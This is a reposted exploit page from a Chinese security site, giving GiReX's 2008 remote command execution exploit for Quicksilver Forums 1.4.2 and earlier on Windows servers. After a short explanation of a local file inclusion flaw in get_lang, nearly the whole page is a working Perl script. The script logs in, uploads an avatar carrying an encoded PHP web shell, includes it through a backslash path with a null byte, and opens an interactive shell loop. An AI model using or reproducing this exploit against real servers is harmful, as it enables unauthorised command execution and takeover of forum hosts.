首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Quicksilver Forums <= 1.4.2 RCE Exploit (windows only)
来源:girex.altervista.org 作者:GiReX 发布时间:2008-11-25  
# Author: __GiReX__
# Homepage: girex.altervista.org

# Date: 24/11/2008

# CMS: Quicksilver Forums <= 1.4.2
# Site: http://www.quicksilverforums.com/

# Bug: Local File Inclusion
# Exploit: Remote Command Execution

# Note: Works with windows servers only
Works regardless php.ini settings

# Bug Discussion:

# file: global.php
# lines: 318-329

function get_lang($lang, $a = null, $path = './', $main = true)
{
if (isset($this->get['lang'])) {
$lang = $this->get['lang'];

}

if (strstr($lang, '/') || !file_exists($path . 'languages/' . $lang . '.php')) {
$lang = 'en';
}

include $path . 'languages/' . $lang . '.php';

# As you can see, Quicksilver filter can be easily bypassed in windows servers
# couse use of backslashes "\" in filesystem's paths.

# Thanks to the functions uset_magic_quotes_gpc() this vuln works regardless php.ini setting

# We can upload a malicious avatar and include it to have a RCE


#!/usr/bin/perl
# Quicksilver Forums <= 1.4.2 RCE Exploit (win only)
# Local File Inclusion / Malicious Avatar Upload
# Coded by __GiReX__

use IO::Socket::INET;
use MIME::Base64;

if(@ARGV < 3)
{
    banner();
    print "[+] You need an user account to run this exploit\n\n";
    print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n";
    print "[+] Example: perl $0 localhost /quick/ test password\n";
    exit;
}

my ($host, $path, $user, $pass) = @ARGV;

$host =~ s/^http:\/\///;
$host =~ s/^www\.//;
$target = "http://${host}${path}";

banner();
check_vuln();

$cookie = do_login() or debug($debug, 1);
upload_avatar() or debug($debug, 2); 

while(1)
{
print "[+] shell\@quick:\$ ";
chomp(my $cmd = <STDIN>);

exit if $cmd eq 'exit';
create_socket();

print $sd  "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n".
   "Host: $host\r\n".
   "Cookie: $cookie\r\n".
   "CMD: ". encode_base64($cmd)."\r\n".
   "Connection: keep-alive\r\n\r\n";

$out .= $_ while <$sd>;

if($out =~ /-code-/)
{
$_out = substr($out, index($out, '-code-') + 6);  $n = index($_out, '-code');
$__out = substr($_out, 0, $n);
}
else
{
debug($out, 3);
}

close($sd);
$out = undef;

print STDOUT "\n". $__out."\n";
}

sub check_vuln
{
create_socket();

print $sd   "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n".
"Host: $host\r\n".
"Connection: keep-alive\r\n\r\n";

while(my $res = <$sd>)
{
$ok = 1 if $res =~ /404 Not Found/;

if($res =~ /<b>Fatal error<\/b>/)
{
close($sd);
return 1;
}

our $debug .= $res;
}

print STDOUT "\n[-] Server not vulnerable, maybe it's not a win server!\n" and exit
if not defined $ok;

debug($debug, 0);
}


sub do_login
{    
    create_socket();
my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia";

print $sd   "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" .
"Host: $host\r\n" .
"Connection: keep-alive\r\n" .
"Content-Type: application/x-www-form-urlencoded\r\n" .
"Content-Length: ". length($data)."\r\n\r\n" .
$data . "\r\n\r\n";
   


while(my $res = <$sd>)
{
if($res =~ /Set-Cookie: (\w+)_user=([0-9]+)/)
{
    $prefix  = $1  unless $prefix;
    $user_id = $2  unless $user_id;
}
elsif($res =~ /Set-Cookie: \w+_pass=([a-z0-9]{32})/)
{
my $hash_pwd = $1;  close($sd);
print STDOUT "\n[+] Logged in with $user account\n";

return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};";
}

our $debug .= $res;
}

close($sd);
return undef;
}

sub upload_avatar
{
create_socket();
# Image content + post's var base64 encoded
    my $data =  "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk".
                 "NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF".
                 "0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t".
                 "LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY".
                 "XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS".
                 "0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E".
                 "aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI".
                 "g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND".
                 "gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5".
                 "hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD".
                 "b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV".
                 "JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ".
                 "hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv".
                 "ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL".
                 "S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS".
                 "1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t".
                 "LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K";

$data = decode_base64($data);

print $sd  "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n".
   "Host: $host\r\n" .
   "Connection: keep-alive\r\n" .
   "Cookie: $cookie\r\n" .
               "Content-Type: multipart/form-data; boundary=---------------------------226482744623805\r\n" .
               "Content-Length: ". length($data)."\r\n\r\n" .
   $data . "\r\n\r\n";
  

while(my $res = <$sd>)
{
if($res =~ /Your avatar has been updated/)
{
print "[+] Malicious avatar uploaded\n\n";   close($sd);
return 1;
}

our $debug .= $res;
}

close($sd);
return undef;
}

sub create_socket
{
our $sd = new IO::Socket::INET( 'PeerAddr' => $host,
'PeerPort' => '80',
'Proto'    => 'tcp',
   ) or die $@;
}

sub debug
{
my $output = shift;
my $errno = shift;

open(DEBUG, '>', 'debug.txt');
print DEBUG $debug;

if($errno eq '0')
{
print STDOUT "\n[-] Unable to request index.php! See debug.txt for more infos\n";
}
if($errno eq '1')
{
print STDOUT "\n[-] Unable to login! See debug.txt for more infos.\n";
}
elsif($errno eq '2')
{
print STDOUT "\n[-] Unable to upload avatar! See debug.txt for more infos.\n";
}
elsif($errno eq '3')
{
print STDOUT "\n[-] Exploit mistake! See debug.txt for more infos.\n";
}

close(DEBUG);
exit;
}

sub banner
{
print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n".
"[+] Local File Inclusion / Malicious Avatar Upload\n".
"[+] Coded by __GiReX__\n\n";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·W3C Amaya 10.1 Web Browser (id
·Total Video Player (vcen.dll)
·VideoScript 3.0 <= 4.1.5.55 Un
·Total Video Player (vcen.dll)
·VideoScript 3.0 <= 4.0.1.50 Of
·Google Chrome MetaCharacter UR
·W3C Amaya 10.1 Web Browser (UR
·Google Chrome Browser MetaChar
·Nero ShowTime 5.0.15.0 m3u Pla
·Clean CMS 1.5 (full_txt.php id
·Exploits Amaya (URL Bar) Remot
·KVIrc 3.4.2 Shiny (uri handler
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved